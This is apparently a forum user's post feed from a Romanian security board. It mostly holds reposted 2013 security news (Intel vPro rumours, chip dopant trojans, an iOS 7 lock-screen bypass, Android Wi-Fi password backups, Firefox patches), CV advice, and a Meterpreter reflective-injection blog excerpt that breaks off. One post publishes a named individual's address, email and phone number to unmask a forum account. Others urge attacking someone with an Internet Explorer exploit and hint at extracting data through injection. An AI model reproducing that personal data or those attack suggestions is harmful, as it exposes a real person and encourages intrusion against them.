Everything posted by Nytro
-
Integer overflow/underflow exploitation tutorial
By Saif El Sherei
www.elsherei.com

Introduction: I decided to get a bit more into Linux exploitation, so I thought it would be nice to document it, as a good friend once said: "you think you understand something until you try to teach it". This is my first try at writing papers. This paper is my understanding of the subject; I understand it might not be complete, and I am open to suggestions and modifications. I hope this project helps others as it helped me. This paper is purely for educational purposes.

Note: the exploitation methods explained in the tutorial below will not work on modern systems due to NX, ASLR, and modern kernel security mechanisms. If we continue this series, we will have a tutorial on bypassing some of these controls.

What is an integer? An integer in computing is a variable holding a whole number, one without a fractional part. The size of an int depends on the architecture, so on the i386 (32-bit) architecture an int is 32 bits. An integer is represented in memory in binary.

Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/overflowunderflow-tutorial.pdf
-
'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs
Tinfoil hat brigade say every PC is on mobile networks, even when powered down
By Richard Chirgwin, 23rd September 2013

Intel has apparently turned up one of the holiest of holy grails in the tech sector, accidentally creating a zero-power-consumption on-chip 3G communications platform as an NSA backdoor.

The scoop comes courtesy of tinfoil socialist site Popular Resistance, in a piece written by freelance truther Jim Stone, who has just discovered the wake-on-LAN capabilities in vPro processors. He writes: "The new Intel Core vPro processors contain a new remote access feature which allows 100 percent remote access to a PC 100 percent of the time, even if the computer is turned off. Core vPro processors contain a second physical processor embedded within the main processor which has its own operating system embedded on the chip itself. As long as the power supply is available and in working condition, it can be woken up by the Core vPro processor, which runs on the system's phantom power and is able to quietly turn individual hardware components on and access anything on them."

A little background: Popular Resistance was formed in 2011 and was part of the 'Occupy' movement, having done its bit in Washington DC. It now promotes an anti-capitalist agenda.

Back to Stone, who says Intel can do all the stuff vPro enables thanks to an undocumented 3G radio buried in its chips that apparently extends wake-on-LAN to wake-on-mobile: "Core vPro processors work in conjunction with Intel's new Anti Theft 3.0, which put 3g connectivity into every Intel CPU after the Sandy Bridge version of the I3/5/7 processors. Users do not get to know about that 3g connection, but it IS there," he writes, "anti theft 3.0 always has that 3G connection on also, even if the computer is turned off" (emphasis added).

No evidence is offered for the assertions detailed above.
And with that, El Reg will now happily open the floor to the commentards … ®

Source: 'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs • The Register
-
If you really don't have anything better to do with those 20 euros, buy me drinks with them.
-
Researchers can slip an undetectable trojan into Intel’s Ivy Bridge CPUs
New technique bakes super stealthy hardware trojans into chip silicon.
by Dan Goodin - Sept 18, 2013

Scientists have developed a technique to sabotage the cryptographic capabilities included in Intel's Ivy Bridge line of microprocessors. The technique works without being detected by built-in tests or physical inspection of the chip.

The proof of concept comes eight years after the US Department of Defense voiced concern that integrated circuits used in crucial military systems might be altered in ways that covertly undermined their security or reliability. The report was the starting point for research into techniques for detecting so-called hardware trojans. But until now, there has been little study into just how feasible it would be to alter the design or manufacturing process of widely used chips to equip them with secret backdoors.

In a recently published research paper, scientists devised two such backdoors they said adversaries could feasibly build into processors to surreptitiously bypass cryptographic protections provided by the computers running the chips. The paper is attracting interest following recent revelations that the National Security Agency is exploiting weaknesses deliberately built into widely used cryptographic technologies so analysts can decode vast swaths of Internet traffic that otherwise would be unreadable.

The attack against the Ivy Bridge processors sabotages the random number generator (RNG) instructions Intel engineers added to the processor. The exploit works by severely reducing the amount of entropy the RNG normally uses, from 128 bits to 32 bits. The hack is similar to stacking a deck of cards during a game of Bridge. Keys generated with an altered chip would be so predictable an adversary could guess them with little time or effort required.
The severely weakened RNG isn't detected by any of the "Built-In Self-Tests" required for the NIST SP 800-90 and FIPS 140-2 compliance certifications mandated by the National Institute of Standards and Technology. The tampering is also undetectable to the type of physical inspection that's required to ensure a chip is "golden," a term applied to integrated circuits known to not include malicious modifications.

Christof Paar, one of the researchers, told Ars the proof-of-concept hardware trojan relies on a technique that requires low-level changes to only a "few dozen transistors." That represents a minuscule percentage of the more than 1 billion transistors overall. The tweaks alter the transistors' and gates' "doping polarity," a change that adds a small number of atoms of material to the silicon. Because the changes are so subtle, they don't show up in the physical inspections used to certify golden chips.

"We want to stress that one of the major advantages of the proposed dopant trojan is that [it] cannot be detected using optical reverse-engineering since we only modify the dopant masks," the researchers reported in their paper. "The introduced trojans are similar to the commercially deployed code-obfuscation methods which also use different dopant polarity to prevent optical reverse-engineering. This suggests that our dopant trojans are extremely stealthy as well as practically feasible."

Besides being stealthy, the alterations can happen at a minimum of two points in the supply chain: (1) during manufacturing, where someone makes changes to the doping, or (2) when a malicious designer changes the layout file of an integrated circuit before it goes to manufacturing.

In addition to the Ivy Bridge processor, the researchers applied the dopant technique to lodge a trojan in a chip prototype that was designed to withstand so-called side channel attacks.
The result: cryptographic keys could be correctly extracted from the tampered device with a correlation close to 1. (In fairness, they found a small vulnerability in the trojan-free chip they used for comparison, but it was unaffected by the trojan they introduced.)

The paper was authored by Georg T. Becker of the University of Massachusetts, Amherst; Francesco Regazzoni of TU Delft, the Netherlands, and ALaRI, University of Lugano, Switzerland; Christof Paar of UMass and the Horst Görtz Institute for IT-Security, Ruhr-Universität Bochum, Germany; and Wayne P. Burleson of UMass.

In an e-mail, Paar stressed that no hardware trojans have ever been found circulating in the real world and that the techniques devised in the paper are mere proofs of concept. Still, the demonstration suggests the covert backdoors are technically feasible. It wouldn't be surprising to see chip makers and certification groups respond with new ways to detect these subtle changes.

Source: Researchers can slip an undetectable trojan into Intel’s Ivy Bridge CPUs | Ars Technica
-
NSA: Snowden was just doing his job
Summary: More details emerge on how Edward Snowden was able to gain access to and copy so much secret information. His job provided the perfect cover for his illegal activities. In response, the NSA is making like the TSA and fighting the last war.
By Larry Seltzer for Zero Day | September 19, 2013

Interviews with two NSA officials by National Public Radio reveal a tragic irony of Edward Snowden's theft and leaking of classified documents: he was just doing his job.

One of the lessons learned from the investigations of the 9/11 Commission was that there was insufficient sharing of intelligence information. In order to facilitate such sharing, the NSA created a file sharing area on the Agency's intranet site. NSA officials told NPR that all of the documents Snowden has leaked came from that sharing area. "Unfortunately for us," one official said, "if you had a top secret SCI [sensitive compartmented information] clearance, you got access to that."

Not only did Snowden have such access, but as a system administrator it was part of his job to search through the shared area for documents which belonged in more restrictive areas and move them. From the NPR article: "It's kind of brilliant, if you're him," an official said. "His job was to do what he did. He wasn't a ghost. He wasn't that clever. He did his job. He was observed [moving documents], but it was his job."

It's a little more complicated than Snowden literally doing his job, although the job was the perfect cover for his activities. The article also notes that the NSA was, at the time, allowing users access to USB ports on computers which had access to the sensitive data. They have, more recently, closed off access to those ports, which Snowden likely used to copy data from NSA systems to a USB thumb drive. Incredibly, this is the same method used by Bradley Manning long ago, but the NSA didn't react to that news.
Restricting access to USB ports has been a standard feature of Windows system management for many years, and there are third-party products that do this as well. The NSA has implemented other practices, including document tagging, to prevent what Snowden did. The tags restrict access to the documents and track their usage. It's all another example of fighting the last war. The NSA, in this way, is following the example of the TSA.

Source: NSA: Snowden was just doing his job | ZDNet
-
iOS 7 lock screen bypass flaw discovered, and how to fix it
Nytro posted a topic in Stiri securitate
iOS 7 lock screen bypass flaw discovered, and how to fix it
Summary: UPDATED 2: The iOS 7 lock screen can be bypassed with a series of gesture techniques, despite the passcode. While apps are blurred out, a major Camera app bug exists, which can allow photos to be edited, deleted, and shared with others while the device is still locked.
By Zack Whittaker for Zero Day | September 19, 2013

Just one day after Apple's latest mobile operating system, iOS 7, was released to the public, one user discovered a security vulnerability in the software's lock screen. In a video posted online, Canary Islands-based soldier Jose Rodriguez detailed the flaw, which allowed him to access the multitasking view of the software without entering a passcode. With this, it's apparent which apps are open and how many notifications there are, as well as the device's home screen.

The video, replicated below, shows the sequence of presses and taps that make this exploit possible, despite being fiddly and taking many attempts. The first step is to bring up the device's Control Center and access the Clock app, then hold down the power button until you are given the on-screen prompt to shut down the device. After you hit cancel, immediately double-tapping the home button brings up the multitasking view as expected.

ZDNet confirmed this bug exists on an array of devices. In our New York newsroom, we tested iOS 7 on an iPhone 4S, an iPhone 5, and the new iPhone 5c. All devices were exploited in the same way with the lock screen bypass technique, and all acted in exactly the same fashion.

However, upon further examination, it's possible to access an array of photos under the Camera Roll, and thus to reach sharing features, including Twitter. If the Camera app is opened first (provided it is accessible from the lock screen), exploiting the same sequence of presses opens the Camera Roll. From there, images can be deleted, uploaded, edited, and shared with others.
These screenshots were taken on an iPhone 4S, giving access to photos and sharing features despite the device being locked with a passcode. (Image: ZDNet)

You can see in the video (below) that even though the multitasking view, which offers a much larger view than previous iOS iterations, is viewable, the contents of the apps are not. iOS 7 blurs the contents of the apps, meaning would-be attackers cannot see what is going on. The only exception is the home screen, which is viewable, including which apps have been installed, along with the user's wallpaper.

Despite the flaw, iOS 7 patches 80 security vulnerabilities, according to ZDNet's Larry Seltzer. But this kind of flaw, albeit minor, may not instill much confidence in users already jarred by the new design and user interface. Rodriguez also found a bug in iOS 6.1.3, which allowed potential hackers to access an iPhone running vulnerable software by ejecting the SIM card tray.

Until Apple issues an official fix, iOS 7 users can simply disable access to the Control Center on the lock screen: in Settings, open Control Center, then switch off Access on Lock Screen so that it no longer appears on the lock screen. We put in a request for comment to Apple but did not hear back at the time of writing. An Apple spokesperson told AllThingsD, however, that the company is "aware" of the issue and will deliver a fix soon.

Updated at 4:15 p.m. ET: with additional details regarding the Camera app. Also added additional attribution to Forbes, which was mistakenly omitted from the original piece. (via Forbes)

Source: iOS 7 lock screen bypass flaw discovered, and how to fix it | ZDNet
-
Intro To Linux System Hardening And Applying It To Your Pentest System

Description: Chris Jenks (rattis) talks about hardening Linux and how you can apply that logic to your pentest system so you don't fall prey to the hack back.

For more information please visit: Security B-Sides / BSidesDetroitConversations

Source: Intro To Linux System Hardening And Applying It To Your Pentest System
-
That "Internet Explorer" tells me more. Throw an IE exploit at them and you'll see who they really are. Poof: https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit
-
Google knows nearly every Wi-Fi password in the world
By Michael Horowitz, September 12, 2013 10:44 PM EDT

If an Android device (phone or tablet) has ever logged on to a particular Wi-Fi network, then Google probably knows the Wi-Fi password. Considering how many Android devices there are, it is likely that Google can access most Wi-Fi passwords worldwide.

Recently IDC reported that 187 million Android phones were shipped in the second quarter of this year. That multiplies out to 748 million phones in 2013, a figure that does not include Android tablets. Many (probably most) of these Android phones and tablets are phoning home to Google, backing up Wi-Fi passwords along with other assorted settings. And, although they have never said so directly, it is obvious that Google can read the passwords. Sounds like a James Bond movie.

Android devices have defaulted to coughing up Wi-Fi passwords since version 2.2. And, since the feature is presented as a good thing, most people wouldn't change it. I suspect that many Android users have never even seen the configuration option controlling this. After all, there are dozens and dozens of system settings to configure. And anyone who does run across the setting cannot be expected to understand its privacy implications. I certainly did not.

Specifically: In Android 2.3.4, go to Settings, then Privacy. On an HTC device, the option that gives Google your Wi-Fi password is "Back up my settings". On a Samsung device, the option is called "Back up my data". The only description is "Back up current settings and application data". No mention is made of Wi-Fi passwords. In Android 4.2, go to Settings, then "Backup and reset". The option is called "Back up my data". The description says "Back up application data, Wi-Fi passwords, and other settings to Google servers". Needless to say, "settings" and "application data" are vague terms.
A longer explanation of this backup feature in Android 2.3.4 can be found in the user's guide on page 374: "Check to back up some of your personal data to Google servers, with your Google Account. If you replace your phone, you can restore the data you’ve backed up, the first time you sign in with your Google Account. If you check this option, a wide variety of your personal data is backed up, including your Wi-Fi passwords, Browser bookmarks, a list of the applications you’ve installed, the words you’ve added to the dictionary used by the onscreen keyboard, and most of the settings that you configure with the Settings application. Some third-party applications may also take advantage of this feature, so you can restore your data if you reinstall an application. If you uncheck this option, you stop backing up your data to your account, and any existing backups are deleted from Google servers."

A longer explanation for Android 4.0 can be found on page 97 of the Galaxy Nexus phone user's guide: "If you check this option, a wide variety of your personal data is backed up automatically, including your Wi-Fi passwords, Browser bookmarks, a list of the apps you've installed from the Market app, the words you've added to the dictionary used by the onscreen keyboard, and most of your customized settings. Some third-party apps may also take advantage of this feature, so you can restore your data if you reinstall an app. If you uncheck this option, your data stops getting backed up, and any existing backups are deleted from Google servers."

Sounds great. Backing up your data/settings makes moving to a new Android device much easier. It lets Google configure your new Android device very much like your old one. What is not said is that Google can read the Wi-Fi passwords. And, if you are reading this and thinking about one Wi-Fi network, be aware that Android devices remember the passwords to every Wi-Fi network they have logged on to.
The Register writes: "The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user's home, and include hotels, shops, libraries, friends' houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents." The good news is that Android owners can opt out just by turning off the checkbox.

Update, Sept 15, 2013: Even if Google deletes every copy of your backed up data, they may already have been compelled to share it with others. And Google will continue to have a copy of the password until every Android device that has ever connected to the network turns off the backing up of settings/data.

The bad news is that, like any American company, Google can be compelled by agencies of the U.S. government to silently spill the beans. When it comes to Wi-Fi, the NSA, CIA and FBI may not need hackers and cryptographers. They may not need to exploit WPS or UPnP. If Android devices are offering up your secrets, WPA2 encryption and a long random password offer no protection. I doubt that Google wants to rat out their own customers. They may simply have no choice. What large public American company would? Just yesterday, Marissa Mayer, the CEO of Yahoo, said executives faced jail if they revealed government secrets. Lavabit felt there was a choice, but it was a single-person operation.

This is not to pick on Google exclusively. After all, Dropbox can read the files you store with them. So too can Microsoft read files stored in SkyDrive. And, although the Washington Post reported back in April that Apple’s iMessage encryption foils law enforcement, cryptographer Matthew Green did a simple experiment that showed that Apple can read your iMessages. In fact, Green's experiment is pretty much the same one that shows that Google can read Wi-Fi passwords.
He describes it: First, lose your iPhone. Now change your password using Apple's iForgot service ... Now go to an Apple store and shell out a fortune buying a new phone. If you can recover your recent iMessages onto a new iPhone -- as I was able to do in an Apple store this afternoon -- then Apple isn't protecting your iMessages with your password or with a device key. Too bad. Similarly, a brand new Android device can connect to Wi-Fi hotspots it is seeing for the very first time. Back in June 2011, writing for TechRepublic, Donovan Colbert described stumbling across this on a new ASUS Eee PC Transformer tablet: I purchased the machine late last night after work. I brought it home, set it up to charge overnight, and went to bed. This morning when I woke I put it in my bag and brought it to the office with me. I set up my Google account on the device, and then realized I had no network connection ... I pulled out my Virgin Mobile Mi-Fi 2200 personal hotspot and turned it on. I searched around Honeycomb looking for the control panel to select the hotspot and enter the encryption key. To my surprise, I found that the Eee Pad had already found the Virgin hotspot, and successfully attached to it ... As I looked further into this puzzling situation, I noticed that not only was my Virgin Hotspot discovered and attached, but a list of other hotspots ... were also listed in the Eee Pad's hotspot list. The only conclusion that one can draw from this is obvious - Google is storing not only a list of what hotspots you have visited, but any private encryption keys necessary to connect to those hotspots ... Micah Lee, staff technologist at the EFF, CTO of the Freedom of the Press Foundation and the maintainer of HTTPS Everywhere, blogged about the same situation back in July. When you format an Android phone and set it up on first run, after you login to your Google account and restore your backup, it immediately connects to wifi using a saved password. 
There’s no sort of password hash that your Android phone could send your router to authenticate besides the password itself. Google stores the passwords in a manner such that they can decrypt them, given only a Gmail address and password.

Shortly after Lee's blog, Ars Technica picked up on this (see Does NSA know your Wi-Fi password? Android backups may give it to them). A Google spokesperson responded to the Ars article with a prepared statement: "Our optional ‘Backup my data’ feature makes it easier to switch to a new Android device by using your Google Account and password to restore some of your previous settings. This helps you avoid the hassle of setting up a new device from scratch. At any point, you can disable this feature, which will cause data to be erased. This data is encrypted in transit, accessible only when the user has an authenticated connection to Google and stored at Google data centers, which have strong protections against digital and physical attacks."

Sean Gallagher, who wrote the Ars article, added "The spokesperson could not speak to how ... the data was secured at rest." Lee responded to this with: "... it’s great the backup/restore feature is optional. It’s great that if you turn it off Google will delete your data. It’s great that the data is encrypted in transit between the Android device and Google’s servers, so that eavesdroppers can’t pull your backup data off the wire. And it’s great that they have strong security, both digital and physical, at their data centers. However, Google’s statement doesn’t mention whether or not Google itself has access to the plaintext backup data (it does)... [The issue is] Not how easy it is for an attacker to get at this data, but how easy it is for an authorized Google employee to get at it as part of their job. This is important because if Google has access to this plaintext data, they can be compelled to give it to the US government."
Google danced around the issue of whether they can read the passwords because they don't want people like me writing blogs like this. Maybe this is why Apple, so often, says nothing. Eventually Lee filed an official Android feature request, asking Google to offer backups that are stored in such a way that only the end user (you and I) can access the data. The request was filed about two months ago and has been ignored by Google.

I am not revealing anything new here. All this has been out in the public before. Below is a partial list of previous articles. However, this story has, on the whole, flown under the radar. Most tech outlets didn't cover it (Ars Technica and The Register being exceptions) for reasons that escape me.

1) Google knows where you've been and they might be holding your encryption keys. June 21, 2011, by Donovan Colbert for TechRepublic. This is the first article I was able to find on the subject. Colbert was not happy, writing: "... my corporate office has a public, protected wireless access point. The idea that every Android device that connects with that access point shares our private corporate access key with Google is pretty unacceptable ... This isn't just a trivial concern. The fact that my company can easily lose control of their own proprietary WPA2 encryption keys just by allowing a user with an Android device to use our wireless network is significant. It illustrates a basic lack of understanding on the ethics of dealing with sensitive corporate and personal data on the behalf of the engineers, programmers and leadership at Google. Honestly, if there is any data that shouldn't be harvested, stored and synched automatically between devices, it is encryption keys, passcodes and passwords."

2) Storage of credentials on Google's servers by Android smartphones (translated from German). July 8, 2013. The University of Passau in Germany tells the university community to turn off Android backups because disclosing passwords to third parties is prohibited. They warn that submitting your password to any third party lets unauthorised people access University services under your identity. They also advise changing all passwords stored on Android devices.

3) Use Android? You're Probably Giving Google All Your Wifi Passwords. July 11, 2013, by Micah Lee. Where I first ran into this story.

4) Android and its password problems open doors for spies. July 16, 2013, by The H Security in Germany. Excerpt: "Tests ... at heise Security showed that after resetting an Android phone to factory settings and then synchronising with a Google account, the device was immediately able to connect to a heise test network secured using WPA2. Anyone with access to a Google account therefore has access to its Wi-Fi passwords. Given that Google maintains a database of Wi-Fi networks throughout the world for positioning purposes, this is a cause for concern in itself, as the backup means that it also has the passwords for these networks. In view of Google's generosity in sharing data with the NSA, this now looks even more troubling ... European companies are unlikely to be keen on the idea of this backup service, activated by default, allowing US secret services to access their networks with little effort."

5) Does NSA know your Wi-Fi password? Android backups may give it to them. July 17, 2013, by Sean Gallagher for Ars Technica. This is the article referred to earlier. After this one story, Ars dropped the issue, which I find strange since they must have realized the implications.

6) Android backup sends unencrypted Wi-Fi passwords to Google. July 18, 2013, by Zeljka Zorz for net-security.org.

7) Would you tell Google your Wi-Fi password? You probably already did... July 18, 2013, by Paul Ducklin writing for the Sophos Naked Security blog. Ducklin writes: "... the data is encrypted in transit, and Google (for all we know) probably stores it encrypted at the other end. But it's not encrypted in the sense of being inaccessible to anyone except you ... Google can unilaterally recover the plaintext of your Wi-Fi passwords, precisely so it can return those passwords to you quickly and conveniently ..."

8) Android Backups Could Expose Wi-Fi Passwords to NSA. July 19, 2013, by Ben Weitzenkorn of TechNewsDaily. This same story also appeared at nbcnews.com and mashable.com.

9) Despite Google's statement, they still have access to your wifi passwords. July 19, 2013, by Micah Lee on his personal blog. Lee rebuts the Google spokesperson's response to the Ars Technica article.

10) Oi, Google, you ate all our Wi-Fi keys - don't let the spooks gobble them too. July 23, 2013, by John Leyden for The Register. Leyden writes: "Privacy experts have urged Google to allow Android users to encrypt their backups in the wake of the NSA PRISM surveillance flap."

11) Google: Keep Android Users' Secure Network Passwords Secure. August 5, 2013, by Micah Lee and David Grant of the EFF. They write: "Fixing the flaw is more complicated than it might seem. Android is an open source operating system developed by Google. Android Backup Service is a proprietary service offered by Google, which runs on Android. Anyone can write new code for Android, but only Google can change the Android Backup Service."

To conclude on a Defensive Computing note, those who need Wi-Fi at home should consider using a router offering a guest network. Make sure that Android devices accessing the private network are not backing up settings to Google. This is not realistic for the guest network, but you can enable the guest network only when needed and then shut it down afterwards. Also, you can periodically change the password of the guest network without impacting your personal wireless devices. At this point, everybody should probably change their Wi-Fi password.
Source: Google knows nearly every Wi-Fi password in the world | Computerworld Blogs
-
Calm down; as far as I know, most state institutions are hosted by and get their Internet access through STS. For example, Academia Tehnica Militara, a university in Bucharest, also gets its IPs from STS.
-
Cluefire and Damnation I don't see what C++ has to do with keeping people from shooting themselves in the foot. C++ will happily load the gun, offer you a drink to steady your nerves, and help you aim. -- Peter da Silva Link: http://cluefire.net/
-
Web vulnerabilities and how to secure against them
-
eusimplu: It's fine either way; I'm just suggesting that the CV list the titles of your more important articles, the ones that could have value for an employer.

UnUser: University can teach you many things: several programming languages, algorithms; it can "force" you to do projects and, very importantly, it can teach you to work in a team. Things like that help a lot once you're hired.

A few more ideas I'd like to give you:
1. Tailor your CV to the position you want: if you want to be a C++ programmer, include as much as possible, even very small projects, and try to leave out other things such as web projects in PHP or anything else.
2. Don't use canned presentation templates, don't exceed 3 pages, and emphasize what you believe an employer wants to see. Oh, and make a separate e-mail address for job applications; x_dark_sexos_boy@yahoo.com is not going to impress an employer.
-
It's just a piece of advice:
- Make your CV
- List all the projects you've worked on
- List all the articles you've written
- List the programming languages you know (meaning you've written at least 2,000-3,000 lines of code in that language and either read a book, not some two-bit tutorial, to learn it, or taken a course)
- Mention anything else you think could be useful
Then, once the CV is done:
1. Read it and form an impression of how you spend your time slacking off
2. Think about what you'll do in the future: do you want to work in the field, or make shawarma?
3. Think from an employer's perspective. You want to hire someone whose CV looks like yours. What do you do?
Post your conclusions here. Do NOT post personal data from the CV; you can post, for example, the projects you worked on. Share your opinion, what came of it, and how satisfied you are with yourself so far. MAKE the CV, don't just think about it. I know some of you are young, but you'll end up writing one anyway, and I think it will be useful to start thinking about it now. Good luck!
-
Firefox 24 Patches 17 Security Vulnerabilities
by Brian Donohue
The Mozilla Foundation released Firefox 24 yesterday, issuing 17 security patches for the browser. Seven of the bulletins received the highest, critical impact rating, four are considered high impact advisories, the second most severe rating, and the remaining six are of moderate impact. Mozilla's patch contained more total and critically rated advisories than any other since January. According to Mozilla's security advisories, critical impact bugs are those that give attackers the ability to run code or install malicious software with no user interaction beyond typical browsing:
The first critical advisory, MFSA 2013-92, resolves a garbage collection hazard with default compartments and frame chain. The bug, which could be exploited to establish a use-after-free scenario, was uncovered by a security researcher operating under the handle Nils and a Mozilla developer named Bobby Holley.
MFSA 2013-90 covers a pair of memory corruption bugs also reported by Nils. The first led to a use-after-free condition while scrolling through an image document and the second had to do with nodes in a range request being added as children of two different parents.
Security researcher Aki Helin found that combining lists, floats, and multiple columns could trigger an exploitable buffer overflow, which Mozilla fixes with MFSA 2013-89.
Using the address sanitizer tool, researcher Scott Bell discovered a use-after-free condition after a <select> form element is destroyed. If MFSA 2013-81 goes unpatched, it could lead to a potentially exploitable crash.
Chrome security team member Abhishek Arya found a crashable use-after-free problem (MFSA 2013-79) in the Animation Manager while also using the address sanitizer tool.
MFSA 2013-78 patches an integer overflow bug, discovered by Alex Chapman, in the Almost Native Graphics Layer Engine (ANGLE) library that Mozilla uses.
The vulnerability existed because "of insufficient bounds checking in the drawLineLoop function, which can be driven by web content to overflow allocated memory, leading to a potentially exploitable crash." The last critical impact bulletin, MFSA 2013-76, fixes a handful of memory safety hazards uncovered by Mozilla developers.
The four high impact advisories fix a JavaScript compartment mismatch issue, an issue in Firefox for Android that allows the loading of shared objects from writeable locations, Mozilla's failure to lock MAR files after signature verification (a problem that could potentially allow an attacker to run executable files), and another crash bug that has to do with the calling scope for JavaScript objects. High impact vulnerabilities are those that an attacker can exploit to gather sensitive data from other sites the user is visiting or inject data or code into those sites, also while the user is browsing normally.
Moderate impact bugs are high or critical impact bugs that an attacker could only exploit under uncommon circumstances when a user is running non-default configurations. Mozilla's fixes for these bugs are as follows: user-defined properties on DOM proxies get the wrong "this" object, WebGL information disclosure through OS X NVIDIA graphics drivers, uninitialized data in IonMonkey, same-origin bypass through symbolic links, NativeKey continues handling key messages after the widget is destroyed, and improper state in the HTML5 Tree Builder with templates.
Source: Mozilla 24 Resolves 17 Security Vulnerabilities | Threatpost
-
You use Windows Server if you have a network of Windows machines that you want to join to a domain, or if you use SharePoint, Outlook (so Exchange), SQL Server, ASP.NET hosting and other Microsoft services. I'm no great expert, but I've poked around a Windows Server myself and it's very easy to configure. It basically gives you a GUI from which you can do anything you want: configure IIS, ASP.NET sites and a pile of other stuff. For everything else there's Linux.
-
Ah, so a "server" is not the Counter-Strike kind. A few thoughts of mine:
1. Servers are much more powerful machines (hardware-wise): faster processors, often multiple processors, more RAM: 8 GB, 16 GB, 32 GB, 48 GB or even more
2. The processors are server-grade. In other words, if a company offers you a server with an i3, i5 or i7 processor, tell them to get lost; those are laptop processors, not server processors. A server processor has to be able to run for years without being shut down, not (probably) catch fire like an i*.
3. Large storage capacity: when needed, 2 TB, or a 500 GB SSD for example, are fine
4. Physically, servers are most often blades (here) so they can easily be mounted next to each other. This is very useful because companies usually have a lot of identical servers, which makes them very easy to rack
5. Hardware-wise they have a lot of ports: Gigabit, multiple RAM slots, many hard-disk slots and much more. This lets you configure a server however you want
6. They draw more power and need constant cooling. Datacenters have their own cooling systems and backup generators
Those would be the main points.
-
Avira launches its 2014 product line in beta testing
By Radu FaraVirusi(com) on September 17, 2013
Avira recently announced to its beta testers that the 2014 version has been released for testing. Apart from small (barely noticeable) changes to the graphics, there is no notable change in the sense of new modules being added or existing ones being improved. The firewall, backup and anti-spam filter have been removed from the new product line. In place of the firewall, a somewhat more advanced package for configuring Windows Firewall is included. Here is the official list of changes:
Discontinued features
Avira Antispam (aka SPACE) is discontinued and removed from the offer. It was in Internet Security and Internet Security Plus.
Local Backup is discontinued and removed from the offer. It was in Internet Security and Internet Security Plus.
Avira FW is discontinued and replaced with Windows Firewall Management for OS higher than Vista.
Additional changes / bugfixes in all products
Enable WFP on Win7 and Win 8 for all products that need it
Remove the safe start functionality from all products and all OS
Known Issues
Symbol check fails on several files
WSCSVC (Windows Security Center Service) shows that Avira is still set as AV Software after uninstallation when the WSCSVC is set to manual start
AntiVir Service will hang sometimes after multiple restarts
Systray icon might be missing even though avgnt.exe is running
Purchase links for Internet Security Suite are broken
LSP Mailguard does not close socket after detection
MD5 mismatch will show up during update from AV13 ISEC to AV14
Free version will be available later next week
I rightly keep wondering who this new version is good for, and why it has to be called 2014 when it is actually below 2013?!
In any case, you can test it yourselves (so that I'm not accused of bias) at: https://betacenter.avira.com/ Source: Avira lanseaza gama de produse 2014 in testare beta
-
for(int i=0;i<n/2;i++){ for(int j=i+1;j<n;j++){
Edit: Sorry, that's not right; the first "for" only runs up to n/2. We have: (n-1)+(n-2)+...+(n-n/2). That is, considerably fewer steps. Why?
At i == 0 we have (n-1) steps
At i == 1 we have (n-2) steps
...
At i == n/2 - 1 we have (n - n/2) steps
The result is the sum of these terms. More precisely: n(n-1)/2 - ( (n/2 - 1) * n/2 )/2. That is, Gauss's sum from 1 to n-1, minus Gauss's sum from 1 to n/2 - 1 (the smallest term we keep is n - n/2 = n/2, so only the terms up to n/2 - 1 get subtracted). The final result works out to: n(3n-2)/8 for even n. I hope I didn't get tangled up somewhere in there: http://i.imgur.com/ebAxHOO.jpg
-
See what can be extracted. Pull out CURRENT_USER to see the hostname.
-
Let me guess: you're an old member with a new account. I don't know why, but all of you, when you "come back" under another name, start using diacritics.
-
Administrative Name: Vasilica Ciobotaru
Administrative Company: Vasilica Ciobotaru
Administrative Address: Convento
Administrative Address: Torrelguna
Administrative Address: Madrid
Administrative Address: 28180
Administrative Address: ES
Administrative Email: ciobi72@yahoo.com
Administrative Tel: +34.666816641
That is, him: https://rstforums.com/forum/members/eta/
-
64bit Pointer Truncation in Meterpreter
If you haven't ever heard of Meterpreter before, you might want to go and take a look at it before reading this post to help give some context. In short, Meterpreter is an amazing library that is part of the Metasploit Framework and can be used to give you tremendous power and control over target machines during a penetration test. Anyone and everyone in the security game is most likely familiar with both Metasploit and Meterpreter, at the very least, if not closely intimate with them. The toolset is fantastic, and is open source! I'm currently in the very fortunate position of working with the crew from Rapid7 to help improve Meterpreter, particularly on the Windows side (both 32 and 64 bit). I have a good list of things to work through while I'm on board, including making it easier to build for potential contributors, and fixing some outstanding issues that the R7 crew haven't had the bandwidth to fix. These people are super-smart and super-nice, and I'm honoured that I've been selected to work alongside them. The purpose of this post is to document the process and resolution of a bug that I have helped resolve since joining. I also aim to lift the lid on Meterpreter a little and help expose how some bits of it work. I hope you enjoy.
Meterpreter Basics
When exploiting a vulnerability during a penetration test using Metasploit, you have a number of payloads you can choose from, which give you some sort of control over your target. Of those payloads, Meterpreter is not only the most common, but is probably the most powerful. Once you have an instance of Meterpreter running on a target, you've got quite a lot of control. You can escalate privileges, dump password hashes, launch processes, upload files, and you can even use it as a pivot-point for launching attacks against other non-routable hosts.
While the power of all this is enough to bake anyone's noodle, the thing that blows my mind the most is Meterpreter's ability to migrate to other processes. That is, Meterpreter can dynamically load itself into another process and then reconnect to your Metasploit session seamlessly without any effort from the attacker (ie. you). Simply executing migrate <process id> at the Meterpreter prompt is all it takes. There are some caveats when it comes to migration. In particular, you need to have permission to write to the target process's memory, otherwise the migration will not succeed. Meterpreter comes in quite a few flavours, including PHP, Python, and native/C for Linux and Windows. Some implementations are more feature-rich than others, but they all have common functionality which makes it easy to perform a variety of functions on a compromised host. We'll be focusing on the Windows native payload in this post, and in particular we'll be looking at how Meterpreter is loaded and executed.
Reflective DLL Injection
Simply put, Reflective DLL Injection is a method for injecting a DLL into a process. No surprises there. However, it has some nifty properties that make it a great candidate for use in tools such as Meterpreter. Some of those points include:
- Position-independence.
- Lack of host system registration.
- Largely undetectable on the target at both a system and process level.
The canonical paper [PDF], written by Stephen Fewer, is well worth reading and can be found on the Harmony Security website. Read it. It's amazing, and does a much better job of explaining itself than I could ever hope to. I would like to point out that there's a multi-stage process involved which includes:
1. Writing the code to an executable area of memory.
2. Executing the loader which creates a valid DLL image in memory.
3. Calling DllMain on the loaded DLL.
4. Returning control to the process that invoked it.
With that in mind, let's take a look at the bug.
The Bug
